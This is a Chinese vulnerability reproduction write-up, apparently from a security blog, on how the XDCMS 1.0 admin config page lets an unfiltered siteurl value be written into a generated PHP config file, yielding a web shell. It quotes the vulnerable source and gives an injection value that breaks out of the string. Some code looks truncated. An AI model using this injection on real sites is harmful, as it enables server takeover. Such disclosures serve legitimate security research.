XDCMS_1.0_后台配置文件getshell

# XDCMS 1.0 后台配置文件getshell

==============================

一、漏洞简介
————

二、漏洞影响
————

XDCMS 1.0

三、复现过程
————

![](/static/qingy/XDCMS_1.0_后台配置文件getshell/img/rId24.png)

刚看到这里的时候,这里的网站地址:`http://127.0.0.5`我很好奇是干嘛的,因为它现在写的是127.0.0.5而网站的ip与这个无关,去翻翻源码看看这玩意是干嘛的

if($tag==’config’){
//判断url是否以/结尾
$urlnum=strlen($info[‘siteurl’])-1;
if(substr($info[‘siteurl’],$urlnum,1)!=”/”){
showmsg(C(“update_url_error”),”-1″);
}//end

$cms=SYS_PATH.’xdcms.inc.php’; //生成xdcms配置文件
$cmsurl=”“;
creat_inc($cms,$cmsurl);

点击保存后,网站获取siteurl没有经过过滤,就拼接到cmsurl字符串变量里去了,然后根据这个cmsurl生成配置文件

配置文件:

这里我们可以构造siteurl:

hello’);?>

点击保存后,我们去查看一下该配置文件:

‘;
define(‘TP_FOLDER’,’dccms’);
define(‘TP_CACHE’,false);
?>

这里的配置文件内容生成外部参数可控,导致了可直接getshell

访问该配置文件页面:`http://www.0-sec.org/system/xdcms.inc.php`

![](/static/qingy/XDCMS_1.0_后台配置文件getshell/img/rId25.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容